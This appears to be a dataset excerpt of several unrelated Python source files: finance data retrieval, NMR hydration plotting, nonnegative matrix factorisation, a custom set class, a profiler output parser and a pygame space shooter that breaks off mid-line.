print('train_time', time()-start_time)\r\n dataset_size = len(epoch_loss)\r\n average_of_per_epoch_training_loss = \\\r\n [sum(i)/dataset_size for i in training_loss]\r\n\r\n print(average_of_per_epoch_training_loss)\r\n print(test_err)\r\n\r\n io_utils.save_training_loss(config.model_name, average_of_per_epoch_training_loss)\r\n io_utils.save_test_err(config.model_name, test_err)\r\n\r\n #plt.plot(average_of_per_epoch_training_loss, label=\"train_err\")\r\n #plt.show()\r\n #plt.plot(test_err,label=\"test_err\")\r\n #plt.show()\r\n\r\n\r\n\r\n","sub_path":"python-src/globerson/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"356662700","text":"# -*- coding: utf-8 -*-\n\"\"\" GOOGLE FINANCE API wrapper \"\"\"\n\n\"\"\"\nAUTHOR: @jimako1989\nGITHUB: github.com/jimako1989/gfinance\nLICENSE: MIT\n\"\"\"\n\nimport os,requests,datetime\nimport pandas as pd\nimport numpy as np\nfrom bs4 import *\n\ndef get_data(currency,freq,period):\n # Arranging ohlc data.\n def split_line(string,basedate,timezone_shift,freq):\n list_str = string.split(',')\n if list_str[0][0]=='a': # The number after the 'a' is a Unix timestamp\n time = [datetime.datetime.fromtimestamp(int(list_str[0][1:])+int(timezone_shift)*60)]\n else: # The numbers without a leading 'a' are \"intervals\".\n time = [datetime.datetime.fromtimestamp(basedate+int(list_str[0])*int(freq)+int(timezone_shift)*60)]\n prices = list(map(float,list_str[1:]))\n return(np.array(time+prices))\n\n URL = 'http://www.google.com/finance/getprices?p='+period+'&f=d,h,o,l,c&i='+freq+'&q='+currency\n #print(\"Downloading from %s\"%URL)\n\n res = requests.get(URL)\n body = res.text.splitlines()\n timezone_shift, string_data = body[6][16:], body[7:]\n data = np.array([None]*5)\n basedate = int(body[7].split(',')[0][1:])\n\n for s in body[8:]:\n # To refresh 'basedate'.\n list_str = s.split(',')\n if list_str[0][0]=='a':\n basedate = int(list_str[0][1:])\n\n data = np.vstack((data,split_line(s,basedate,timezone_shift,freq)))\n data = data[1:]\n df = pd.DataFrame(data=data[:,1:],index=pd.to_datetime(data[:,0]),columns=body[4].split(',')[1:])\n return(df)\n","sub_path":"lib/gfinance.py","file_name":"gfinance.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"50276148","text":"import nmrglue\nimport pylab\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom scipy.ndimage import gaussian_filter\nimport numpy as np\nimport copy\nx = 165000 # remove noise level, change 200000\n\n# standard color scale\ncmap = matplotlib.colors.LinearSegmentedColormap.from_list(\"\", [(0, \"#ff0000\"), (0.005, \"#ff3333\"), (0.009, \"#ff4d4d\"),\n (0.045, \"#ffff80\"), (0.090, \"#ffff66\"), (0.15, \"#ffff4d\"),\n (0.20, \"#ffff33\"), (0.28, \"#99e699\"), (0.35, \"#85e085\"),\n (0.4, \"#00cc44\"), (0.55, \"#00b33c\"),\n (0.65, \"#8080ff\"), (0.82, \"#6666ff\"),\n (0.96, \"#3333ff\"), (1, \"#0000ff\")])\n#\n# cmap = matplotlib.colors.LinearSegmentedColormap.from_list(\"\", [(0, \"#ff0000\"), (0.005, \"#ff3333\"), (0.009, \"#ff4d4d\"),\n# (0.035, \"#ffff80\"), (0.150, \"#ffff66\"), (0.2, \"#ffff4d\"),\n# (0.25, \"#ffff33\"), (0.38, \"#99e699\"), (0.52, \"#85e085\"),\n# (0.6, \"#00cc44\"), (0.65, \"#00b33c\"),\n# (0.7, \"#8080ff\"), (0.85, \"#6666ff\"),\n# (0.96, \"#3333ff\"), (1, \"#0000ff\")])\n#\n# cmap = matplotlib.colors.LinearSegmentedColormap.from_list(\"\", [\n# (0, \"#ff0000\"), (0.25, \"#ffff4d\"),\n# (0.5, \"#66ff66\"),\n# (0.75, \"#3333ff\"), (1, \"#0000ff\")])\n\n# get bruker data( create file \"test\", add all control and water-edited spectra)\ndef get_data():\n k = []\n j = 0\n t = []\n for i in [\"1000\", \"1001\", \"1002\", \"1003\", \"1004\", \"1005\",\"1006\",\"1007\"]:\n dic, data = nmrglue.fileio.bruker.read_pdata(dir=\"C:\\\\Bruker\\\\TopSpin4.0.6\\\\examdata\\\\test\\\\\" + i +\"\\\\pdata\\\\1\",\n bin_files=None, procs_files=None, read_procs=True, acqus_files=None,\n read_acqus=True, scale_data=True, shape=None, submatrix_shape=None,\n all_components=False, big=None, isfloat=None)\n if j % 2 == 0:\n t = []\n t.append(data)\n else:\n t.append(data)\n k.append(copy.deepcopy(t))\n j = j + 1\n return k\n\n# remove noise level, change 200000 as you wish\ndef set_data(lists):\n lists2 = []\n l = 0\n t = []\n for i in lists:\n for j in i:\n j = np.asarray(j)\n j[j < x] = 0\n if l % 2 == 0:\n t = []\n t.append(j)\n else:\n t.append(j)\n lists2.append(copy.deepcopy(t))\n l = l + 1\n return lists2\n\n# S/S0 ratio\ndef cal(S1_contl, S1_wtr):\n for key1, value1 in enumerate(S1_contl):\n for key2, val in enumerate(value1):\n try:\n if S1_contl[key1, key2] > 0:\n data3[key1, key2] = (S1_wtr[key1, key2] * 0.5/ S1_contl[key1, key2])\n # data3[key1, key2] = (S1_wtr[key1, key2] - S1_contl[key1, key2])\n else:\n data3[key1, key2] = 0\n except:\n data3[key1, key2] = 0\n return data3\n\ngraph_data = []\n\nfor S1_contl, S1_wtr in set_data(get_data()):\n plot = []\n data3 = np.copy(S1_wtr)\n data4 = cal(S1_contl, S1_wtr)\n\n # select area\n data5 = data4[2:431, 719:842] # for hydration map\n data6 = data4[381:817, 1028:1136]\n # data1 = data1[3:436, 708:866] # for contour lines\n print(np.max(data5))\n\n # data4 = data4/np.max(data4)\n\n\n for key1, value1 in enumerate(data4):\n for key2, val in enumerate(value1):\n if data4[key1, key2] > 1:\n data4[key1, key2] = 0.9936\n\n print(np.max(data5))\n\n # create contour\n cl = [0.0125 * 1.2 ** x for x in range(25)] # for hydration map\n cl2 = [0.01 * 2.4 ** x for x in range(10)] # for contour lines\n\n # noise cancellation\n data6 = gaussian_filter(data6, sigma=0.56) # for hydration map\n # data1 = gaussian_filter(data1, sigma=0.8) # for contour lines\n plot.append(copy.deepcopy(data5)) # for lignin region (only for plants)\n plot.append(copy.deepcopy(data6)) # for polysaccharide region\n graph_data.append(copy.deepcopy(plot))\n\nfig, axs = plt.subplots(nrows=len(graph_data), ncols=2, figsize=(4, 4), constrained_layout=True) # change ncols if you plot two regions\n\nfor i in range(len(graph_data)):\n for j in range(2):\n plt.axes(axs[i][j])\n clt = pylab.contourf(graph_data[i][j], cl, alpha=1,cmap=cmap) # for hydration map\n for c in clt.collections:\n c.set_edgecolor(\"face\")\n c.set_linewidth(0.000000001)\n\n\npylab.colorbar(cmap=\"cmap\")\n# cnt = pylab.contour(data1, cl2, alpha=0.1, colors=\"black\") # for contour lines\n\npylab.savefig(\"Hydration_plot.svg\")\npylab.show()\n","sub_path":"src/new3.py","file_name":"new3.py","file_ext":"py","file_size_in_byte":5339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"463627132","text":"import numpy as np\n\n\ndef positive_projection(array):\n \"\"\"\n Returns a projection onto the positive orthant of a vector\n :param array:\n :return:\n \"\"\"\n return np.clip(array, a_min=0, a_max = None)\n\n\ndef fip(A, B):\n \"\"\"\n A helper function just to clean up some notation. Used in checking Armijo criterion for line search implementation\n :param A:\n :param B:\n :return:\n \"\"\"\n return A.flatten().dot(B.flatten())\n\n\nclass NMF:\n\n def __init__(self, data, k):\n self.X = np.array(data) # actual data matrix\n self.W = np.array(data > 0) # missing data indicator matrix\n self.k = k # number of hidden features\n self.m = data.shape[0]\n self.n = data.shape[1]\n self.A = np.matrix(np.zeros((self.m, self.k)))\n self.S = np.matrix(np.zeros((self.k, self.n)))\n self.norms = []\n self.scale = np.max(self.X.flatten())\n self.epsilon = 10e-6\n\n\n def f(self, A, S):\n \"\"\"\n Implements the objective function\n :param A: candidate A solution\n :param S: candidate S solution\n :return:\n \"\"\"\n return 1/2 * np.linalg.norm(self.W * (self.X - A@S)) ** 2\n\n def f_A(self, A, S):\n \"\"\"\n Implements the derivative w.r.t A of the objective function\n :param A:\n :param S:\n :return:\n \"\"\"\n return (self.W * (A@S))@S.T - (self.W * self.X)@S.T\n\n def f_S(self, A, S):\n \"\"\"\n Implements the derivative w.r.t. S of the objective function\n :param A:\n :param S:\n :return:\n \"\"\"\n return A.T@(self.W * (A@S)) - A.T@(self.W * self.X)\n\n\n def multiplicative_update(self, max_iter=1000, verbose=10, tol=10e-6, A_start=None, S_start=None):\n \"\"\"\n Implements a multiplicative update scheme for nonnegative matrix factorization\n :param max_iter: max number of iterations to complete\n :param verbose: number of iterations between print statements; if 0, does not print\n :param A_start: starting A matrix, can be useful for comparison purposes\n :param S_start: starting S matrix, can be useful for comparison purposes\n :return:\n \"\"\"\n self.norms = []\n\n if A_start is not None:\n A = A_start\n else:\n A = np.random.uniform(self.epsilon, self.scale, size=(self.m, self.k))\n\n if S_start is not None:\n S = S_start\n else:\n S = np.random.uniform(self.epsilon, self.scale, size=(self.k, self.n))\n\n iter_ = 0\n while iter_ <= max_iter:\n norm = self.f(A, S)\n self.norms.append(norm)\n if verbose and not iter_ % verbose:\n print(\"MU Iter: \", iter_, \"Norm: \", self.norms[-1])\n A = np.multiply(A, np.divide((self.W * self.X)@ S.T, (self.W * (A@S))@S.T + self.epsilon))\n S = np.multiply(S, np.divide(A.T @ (self.W * self.X), A.T@(self.W * (A@S)) + self.epsilon))\n # TODO: find a better programmatic way to do this\n if iter_ >= 2 and abs(self.norms[-1] - self.norms[-2]) <= tol:\n break\n\n iter_ += 1\n\n self.A = A\n self.S = S\n\n def alternating_least_squares(self, max_iter=1000, verbose=10, tol=10e-6, A_start=None):\n \"\"\"\n Implements alternating least squares scheme\n :param max_iter:\n :param verbose:\n :param tol:\n :param A_start: starting value of A matrix, useful for comparison purposes\n :param pinv: defines whether to use psuedoinverses and projection to solve the nonnegative least squares subproblem,\n or to use the native scipy.optimize.nnls method.\n :return:\n \"\"\"\n\n self.norms = []\n\n if A_start is not None:\n A = A_start\n else:\n A = np.random.uniform(self.epsilon, self.scale, size=(self.m, self.k))\n\n iter_ = 0\n while iter_ <= max_iter:\n S = positive_projection(np.linalg.pinv(A) @ self.X)\n A = positive_projection(self.X @ np.linalg.pinv(S))\n\n norm = self.f(A, S)\n self.norms.append(norm)\n if verbose and not iter_ % verbose:\n print(\"ALS Iter: \", iter_, \"Norm: \", self.norms[-1])\n\n # other stopping condition\n if iter_ >= 2 and abs(self.norms[-1] - self.norms[-2]) <= tol:\n break\n\n iter_ += 1\n\n self.A = A\n self.S = S\n\n def hierarchical_alternating_least_squares(self, max_iter=1000, verbose=10, tol=10e-6, A_start=None, S_start=None):\n \"\"\"\n Implements alternating least squares scheme. This appears to be equivalent to the Rank-One Residue Iteration\n (RRI) update scheme.\n :param max_iter:\n :param verbose:\n :param tol:\n :param A_start: seed A matrix to start iterating with\n :param S_start: seed S matrix to start iterating with\n :return:\n \"\"\"\n\n self.norms = []\n\n if A_start is not None:\n A = A_start\n else:\n A = np.random.uniform(self.epsilon, self.scale, size=(self.m, self.k))\n\n if S_start is not None:\n S = S_start\n else:\n S = np.random.uniform(self.epsilon, self.scale, size=(self.k, self.n))\n\n iter_ = 0\n while iter_ <= max_iter:\n norm = self.f(A, S)\n self.norms.append(norm)\n if verbose and not iter_ % verbose:\n print(\"HALS Iter: \", iter_, \"Norm: \", self.norms[-1])\n for j in range(self.k):\n # need to be aware of division by 0\n A[:, j] = positive_projection(A[:, j] + ((self.X@S.T)[:, j] - A@((S@S.T)[:, j]))/((S@S.T)[j, j] + tol))\n S[j, :] = positive_projection(S[j, :] + ((self.X.T@A)[:, j] - S.T@((A.T@A)[:, j]))/((A.T@A)[j, j] + tol))\n\n\n # other stopping condition\n if iter_ >= 2 and abs(self.norms[-1] - self.norms[-2]) <= tol:\n break\n\n iter_ += 1\n\n self.A = A\n self.S = S\n\n def projected_gradient(self, alpha=.001, max_iter=1000, verbose=10, tol=10e-6, A_start=None, S_start=None):\n \"\"\"\n\n :param alpha: step size for a projected gradient approach\n :param max_iter:\n :param verbose:\n :param tol:\n :return:\n \"\"\"\n self.norms = []\n\n if A_start is not None:\n A = A_start\n else:\n A = np.random.uniform(self.epsilon, self.scale, size=(self.m, self.k))\n\n if S_start is not None:\n S = S_start\n else:\n S = np.random.uniform(self.epsilon, self.scale, size=(self.k, self.n))\n\n iter_ = 0\n while iter_ <= max_iter:\n norm = self.f(A, S)\n self.norms.append(norm)\n if verbose and not iter_ % verbose:\n print(\"PG Iter: \", iter_, \"Norm: \", self.norms[-1])\n A = positive_projection(A - alpha * self.f_A(A, S))\n S = positive_projection(S - alpha * self.f_S(A, S))\n\n # other stopping condition\n if iter_ >= 2 and abs(self.norms[-1] - self.norms[-2]) <= tol:\n break\n\n iter_ += 1\n\n self.A = A\n self.S = S\n\n def line_search_projected_gradient(self, alpha=.001, beta=.1, sigma=0.01, max_iter=1000, verbose=10, tol=10e-6,\n A_start=None, S_start=None):\n \"\"\"\n Implements a backwards line search algorithm for choosing step size with gradient descent\n :param alpha1: step size for A descent\n :param alpha2: step size for S descent\n :param beta:\n :param sigma:\n :param max_iter:\n :param verbose:\n :param tol:\n :return:\n \"\"\"\n self.norms = []\n\n if A_start is not None:\n A = A_start\n else:\n A = np.random.uniform(self.epsilon, self.scale, size=(self.m, self.k))\n\n if S_start is not None:\n S = S_start\n else:\n S = np.random.uniform(self.epsilon, self.scale, size=(self.k, self.n))\n\n default_alpha = alpha\n iter_ = 0\n while iter_ <= max_iter:\n norm = self.f(A, S)\n self.norms.append(norm)\n if verbose and not iter_ % verbose:\n print(\"LSPG Iter: \", iter_, \"Norm: \", self.norms[-1])\n\n A_tent = positive_projection(A - alpha * self.f_A(A, S))\n while self.f(A_tent, S) - self.f(A, S) > sigma * fip(self.f_A(A, S), A_tent-A):\n alpha *= beta\n print(\"ALPHA: \", alpha)\n A_tent = positive_projection(A - alpha * self.f_A(A, S))\n\n A = A_tent\n\n S_tent = positive_projection(S - alpha * self.f_S(A, S))\n while self.f(A, S_tent) - self.f(A, S) > sigma * fip(self.f_S(A, S), S_tent-S):\n alpha *= beta # make alpha2 smaller\n S_tent = positive_projection(S - alpha * self.f_S(A, S))\n\n S = S_tent\n\n\n\n # other stopping condition\n if iter_ >= 2 and abs(self.norms[-1] - self.norms[-2]) <= tol:\n break\n\n iter_ += 1\n\n self.A = A\n self.S = S\n\n def sgd(self, alpha=.001, max_iter=1000, verbose=10, tol=10e-6, A_start=None, S_start=None):\n # THIS CODE IS INSPIRED BY, BUT NOT COPIED FROM, http://www.albertauyeung.com/post/python-matrix-factorization/\n \"\"\"\n Implements a stochastic gradient descent training method\n :param alpha:\n :param max_iter:\n :param verbose:\n :param A_start:\n :param S_start:\n :return:\n \"\"\"\n\n self.norms = []\n\n if A_start is not None:\n A = A_start\n else:\n A = np.random.uniform(self.epsilon, self.scale, size=(self.m, self.k))\n\n if S_start is not None:\n S = S_start\n else:\n S = np.random.uniform(self.epsilon, self.scale, size=(self.k, self.n))\n\n samples = [\n (i, j, self.X[i, j])\n for i in range(self.m)\n for j in range(self.n)\n if self.X[i, j] > 0\n ]\n\n iter_ = 0\n while iter_ <= max_iter:\n norm = self.f(A, S)\n self.norms.append(norm)\n if verbose and not iter_ % verbose:\n print(\"SGD Iter: \", iter_, \"Norm: \", self.norms[-1])\n\n np.random.shuffle(samples)\n for i, j, r in samples:\n prediction = A[i, :].dot(S[:, j])\n e = (r - prediction)\n A[i, :] += alpha * (e * S[:, j])\n S[:, j] += alpha * (e * A[i, :])\n\n\n\n\n # other stopping condition\n if iter_ >= 2 and abs(self.norms[-1] - self.norms[-2]) <= tol:\n break\n\n iter_ += 1\n\n","sub_path":"nonnegative_matrix_factorization.py","file_name":"nonnegative_matrix_factorization.py","file_ext":"py","file_size_in_byte":10841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"221307932","text":"\"\"\"Description: This program is a custom set of methods for the set class, and includes a lot of overrides.\n\n\n_author_ = 'Dakota Parks', 'Ian Cross', 'Suman Koirala'\n_date_ = '4/22/2015'\n\n\"\"\"\n\nclass CustomSet:\n def __init__(self, listOfNums):\n \"\"\"Preconditions: Accepts list of nums, expected to be a list of ints.\n Description: This is a contructor that takes a list of nubmers and then returns a list without any duplicates\n Postconditions: An object of type CustomSet is created, which is a list\"\"\"\n self._newList=[]\n self._listOfNums=listOfNums\n for el in self._listOfNums:\n if el not in self._newList:\n self._newList.append(el)\n self._listOfNums = sorted(self._newList)\n\n def getList(self):\n return self._listOfNums\n \n def __contains__(self, member):\n \"\"\"Preconditions: Accepts self and member, expected to be an int or string..\n Description: This method overrides \"in\" and looks for the specific member in the set.\n Postconditions: Prints either \"Yes or \"Not there\".\"\"\"\n if member in self._listOfNums:\n print(\"Yes\")\n if member not in self._listOfNums:\n print(\"Not there\")\n\n def __str__(self):\n \"\"\"Preconditions: Only recieves self.\n Description: Prints a string of the customset object.\n Postconditions: Nothing, only returns a string.\"\"\"\n return(str(self._listOfNums))\n \n def __add__(self, other):\n \"\"\"Pre-conditions: This program assumes that the both variables are\n of the type CustomSet. \n Description: This mehtod overloads the \"+\" on two CustomSet. It\n returns a new CustomSet that is the union of the two sets.\n Post-conditions: Makes a new CustomSet Object with the results of\n this operation. \"\"\"\n \n firstlist = self.getList()\n secondlist = other.getList()\n newlist = []\n for i in secondlist:\n if i not in firstlist:\n newlist.append(i)\n for i in firstlist:\n if i not in newlist:\n newlist.append(i)\n newSet = CustomSet(newlist)\n return newSet\n\n def __and__(self, other):\n \"\"\"Pre-conditions: This program assumes that the both variables are\n of the type CustomSet. \n Description: This method allows the intersection of two sets by\n using the \"&\" between two CustomSet objects. It returns a new\n set object with the common elelments between both sets.\n Post-conditions: Makes a new CustomSet Object with the results of\n this operation. \"\"\"\n newlist = []\n firstlist = self.getList()\n secondlist = other.getList()\n for i in firstlist:\n for x in secondlist:\n if i == x:\n newlist.append(i)\n newSet = CustomSet(newlist)\n return newSet\n \n def __sub__(self, other):\n \"\"\"Pre-Conditions: This program assumes that the both variables are\n of the type CustomSet.\n Description: This method lets the \"-\" work with custom sets. It\n returns a new set with the elements exclusive to the first set.\n Post-Conditions: Makes a new CustomSet Object with the results of\n this operation.\"\"\"\n newlist = []\n firstlist = self.getList()\n secondlist = other.getList()\n for i in firstlist:\n if i not in secondlist:\n newlist.append(i)\n newSet = CustomSet(newlist)\n return newSet\n \n def brackets(self):\n \"\"\"Preconditions: Only recives self.\n Description: Prints a string of the customset object surrounded by brackets.\n Postconditions: Nothing, returns a string.\"\"\"\n return(\"{ \"+str(self)+\" }\")\n \n def __ge__(self,other):\n \"\"\"\n Description: If one number is greater than other or not\n Preconditions: Two Values of datatype Customset.\n Postcondition:None\n \"\"\" \n if self._newList >= other._newList:\n return \"Yes\"\n else:\n return \"No Subset\"\n \n def __le__(self,other):\n \"\"\"\n Description: If one number is less than other or not.\n Precondition: Two values of datatype CuustomerSet.\n PostCondition:None\n \"\"\" \n if self._newList <= other._newList: \n return \"Yes\"\n else:\n return \"No Subset\"\n def __len__(self):\n \"\"\"\n Description: Find the len of given list.\n Precondition:none\n postcondition:none\n \"\"\"\n return len(self._newList)\n\n\n\n","sub_path":"modCustomSet.py","file_name":"modCustomSet.py","file_ext":"py","file_size_in_byte":5223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"424336768","text":"#!/usr/bin/python\n\n################################################################################\n# Copyright (c) 2018 Advanced Micro Devices, Inc. All rights reserved.\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n################################################################################\n\nimport os, sys, re\n\n# Parsing results in the format:\n#dispatch[0], queue_index(0), kernel_name(\"SimpleConvolution\"), time(1048928000311041,1048928006154674,1048928006168274,1048928006170503):\n# GRBM_GUI_ACTIVE (74332)\n# SQ_WAVES (4096)\n# SQ_INSTS_VMEM_RD (36864)\n\n# global vars\nvar_list = ['Index', 'KernelName', 'DispatchNs', 'BeginNs', 'EndNs', 'CompleteNs']\nvar_table = {}\n#############################################################\n\ndef fatal(msg):\n sys.stderr.write(sys.argv[0] + \": \" + msg + \"\\n\");\n sys.exit(1)\n#############################################################\n\n# parse results method\ndef parse_res(infile):\n if not os.path.isfile(infile): fatal(\"Error: input file '\" + infile + \"' not found\")\n inp = open(infile, 'r')\n\n beg_pattern = re.compile(\"^dispatch\\[(\\d*)\\], queue_index\\(\\d*\\), kernel_name\\(\\\"([^\\\"]*)\\\"\\)\")\n ts_pattern = re.compile(\", time\\((\\d*),(\\d*),(\\d*),(\\d*)\\)\")\n var_pattern = re.compile(\"^\\s*([^\\s]*)\\s+\\((\\d*)\\)\")\n\n dispatch_number = 0\n for line in inp.readlines():\n record = line[:-1]\n\n m = var_pattern.match(record)\n if m:\n if not dispatch_number in var_table: fatal(\"Error: dispatch number not unique '\" + str(dispatch_number) + \"'\")\n var = m.group(1)\n val = m.group(2)\n var_table[dispatch_number][m.group(1)] = m.group(2)\n if not var in var_list: var_list.append(var)\n\n m = beg_pattern.match(record)\n if m:\n dispatch_number = m.group(1)\n if not dispatch_number in var_table:\n var_table[dispatch_number] = {\n 'Index': dispatch_number,\n 'KernelName': \"\\\"\" + m.group(2) + \"\\\"\"\n }\n m = ts_pattern.search(record)\n if m:\n var_table[dispatch_number]['DispatchNs'] = m.group(1)\n var_table[dispatch_number]['BeginNs'] = m.group(2)\n var_table[dispatch_number]['EndNs'] = m.group(3)\n var_table[dispatch_number]['CompleteNs'] = m.group(4)\n\n inp.close()\n#############################################################\n\n# print results table method\ndef print_tbl(outfile):\n global var_list\n if len(var_table) == 0: return 1\n\n out = open(outfile, 'w')\n\n keys = var_table.keys()\n keys.sort(key=int)\n\n entry = var_table[keys[0]]\n list1 = []\n for var in var_list:\n if var in entry:\n list1.append(var)\n var_list = list1\n\n for var in var_list: out.write(var + ',')\n out.write(\"\\n\")\n\n for ind in keys:\n entry = var_table[ind]\n dispatch_number = entry['Index']\n if ind != dispatch_number: fatal(\"Dispatch #\" + ind + \" index mismatch (\" + dispatch_number + \")\\n\")\n for var in var_list: out.write(entry[var] + ',')\n out.write(\"\\n\")\n\n out.close()\n return 0\n#############################################################\n\n# main\nif (len(sys.argv) < 3): fatal(\"Usage: \" + sys.argv[0] + \" \")\n\noutfile = sys.argv[1]\ninfiles = sys.argv[2:]\nfor f in infiles:\n parse_res(f)\nret = print_tbl(outfile)\nsys.exit(ret)\n#############################################################\n","sub_path":"bin/tblextr.py","file_name":"tblextr.py","file_ext":"py","file_size_in_byte":4321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"553440641","text":"import pygame\nimport random\nfrom os import path\n\nimg_dir = path.join(path.dirname(__file__), 'img')\nsnd_dir = path.join(path.dirname(__file__), 'snd')\n\nPOWERUP_TIME = 5000 # 5 seconden power up tijd\n\nWIDTH = 1280 # breedte scherm\nHEIGHT = 720 # hoogte scherm\nFPS = 60 # frame per second = 60\n\n# Kleuren gedefinieerd\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nBLUE = (0, 0, 255)\nBROWN = (101, 67, 33)\nGREY = (20, 20, 20)\n\npygame.init()\npygame.mixer.init() # Pygame code waardoor muziek werkt\n\ndef draw_text(surf, text, size, x, y):\n font_name = pygame.font.Font(\"Blitz/8.TTF\", size)\n text_surface = font_name.render(text, True, WHITE)\n text_rect = text_surface.get_rect()\n text_rect.midtop = (x, y)\n surf.blit(text_surface, text_rect)\n\ndef newpowerup():\n pow = Pow()\n all_sprites.add(pow)\n powerups.add(pow)\n\ndef newmob():\n m = Mob()\n all_sprites.add(m)\n mobs.add(m)\n\ndef draw_shield_bar(surf, x, y, pct):\n if pct < 0:\n pct = 0\n BAR_LENGTH = 100\n BAR_HEIGHT = 20\n fill = (pct / 100) * BAR_LENGTH\n outline_rect = pygame.Rect(x, y, BAR_LENGTH, BAR_HEIGHT)\n fill_rect = pygame.Rect(x, y, fill, BAR_HEIGHT)\n pygame.draw.rect(surf, GREEN, fill_rect)\n pygame.draw.rect(surf, WHITE, outline_rect, 2)\n\ndef draw_lives(surf, x, y, lives, img):\n for i in range(lives):\n img_rect = img.get_rect()\n img_rect.x = x + 30 * i\n img_rect.y = y\n surf.blit(img, img_rect)\n\ndef show_go_screen():\n global tunnels, all_sprites, tunnel_hoogte, tunnel_gat, diff_1, diff_2, diff_3\n screen.blit(background, (0,0))\n draw_text(screen, \"Space Escape\", 70, WIDTH / 2, HEIGHT / 4)\n\n draw_text(screen, \"PowerUps\", 30, WIDTH / 2, HEIGHT / 2)\n draw_text(screen, \"Pill gives Shield Restore and Bullets\", 20, WIDTH / 2, HEIGHT / 1.8)\n draw_text(screen, \"Shield gives Shield Restore\", 20, WIDTH / 2, HEIGHT / 1.7)\n draw_text(screen, \"Bolt gives Bullets\", 20, WIDTH / 2, HEIGHT / 1.6)\n\n draw_text(screen, \"Keys\", 30, WIDTH / 2, HEIGHT / 1.4)\n draw_text(screen, \"Use the arrow keys to move around\", 20, WIDTH / 2, HEIGHT / 1.3)\n draw_text(screen, \"Use space to shoot\", 20, WIDTH / 2, HEIGHT / 1.25)\n draw_text(screen, \"Press R to begin\", 20, WIDTH / 2, HEIGHT / 1.15)\n draw_text(screen, \"Press esc or q key to Exit at any time\", 20, WIDTH / 2, HEIGHT / 1.1)\n #draw_text(screen, \"Highscore: \" + str(highscore), 20, WIDTH / 2, HEIGHT / 3)\n pygame.display.flip()\n waiting = True\n while waiting:\n clock.tick(FPS)\n for event in pygame.event.get():\n if event.type == pygame.QUIT: # Rood kruisje klikken sluit python\n pygame.quit()\n if pygame.key.get_pressed()[pygame.K_r]: # R klikken start de game\n waiting = False\n\n tunnel_gat = 400\n tunnel_half = (HEIGHT / 2) - (tunnel_gat / 2)\n tunnel_i = 0\n tunnel_hoogte = 200\n\n diff_1 = False\n diff_2 = False\n diff_3 = False\n\n while len(tunnels) < 128 * 2 + 10:\n while tunnel_hoogte > tunnel_half:\n tunnel_hoogte += -5\n while tunnel_hoogte <= 0:\n tunnel_hoogte += 5\n\n tunnel_hoogte += random.randrange(-5, 6)\n\n # Boven Helft Tunnel\n t = Tunnel(tunnel_i, 0, tunnel_hoogte)\n tunnels.add(t)\n # Onder Helft Tunnel\n t = Tunnel(tunnel_i, HEIGHT - tunnel_hoogte, tunnel_hoogte)\n tunnels.add(t)\n tunnel_i += 10\n\nclass Tunnel(pygame.sprite.Sprite):\n def __init__(self, x, y, h):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.Surface((10,h))\n self.image.fill(GREY)\n self.rect = self.image.get_rect()\n self.rect.topleft = (x, y)\n\n def update(self):\n\n self.rect.x += -5\n\nclass Player(pygame.sprite.Sprite):\n # Sprite for the Player\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.image.load(\"SE/spaceship.png\").convert_alpha()\n self.image = pygame.transform.rotate(self.image, 270)\n self.image = pygame.transform.scale(self.image, (60, 60))\n self.rect = self.image.get_rect()\n self.radius = 20\n #pygame.draw.circle(self.image, RED, self.rect.center, self.radius)\n self.rect.center = (WIDTH / 4, HEIGHT / 2)\n self.speedx = 0\n self.speedy = 0\n self.shield = 100\n self.shoot_delay = 250\n self.last_shot = pygame.time.get_ticks()\n self.lives = 3\n self.hidden = False\n self.hide_timer = pygame.time.get_ticks()\n self.power = 0\n self.power_time = pygame.time.get_ticks()\n\n def powerup(self):\n self.power += 1\n self.power_time = pygame.time.get_ticks()\n\n def update(self):\n # Time out for powerups\n if self.power >= 1 and pygame.time.get_ticks() - self.power_time > POWERUP_TIME:\n self.power -= 1\n self.power_time = pygame.time.get_ticks()\n\n # Unhide if hidden\n if self.hidden and pygame.time.get_ticks() - self.hide_timer > 1000:\n self.hidden = False\n self.rect.center = (WIDTH / 4, HEIGHT / 2)\n self.speedx = 0\n self.speedy = 0\n keystate = pygame.key.get_pressed()\n if keystate[pygame.K_DOWN] or keystate[pygame.K_s]:\n self.speedy += 5\n if keystate[pygame.K_UP] or keystate[pygame.K_w]:\n self.speedy -= 5\n if keystate[pygame.K_RIGHT] or keystate[pygame.K_d]:\n self.speedx += 5\n if keystate[pygame.K_LEFT] or keystate[pygame.K_a]:\n self.speedx -= 5\n if keystate[pygame.K_SPACE]:\n self.shoot()\n\n self.rect.x += self.speedx\n self.rect.y += 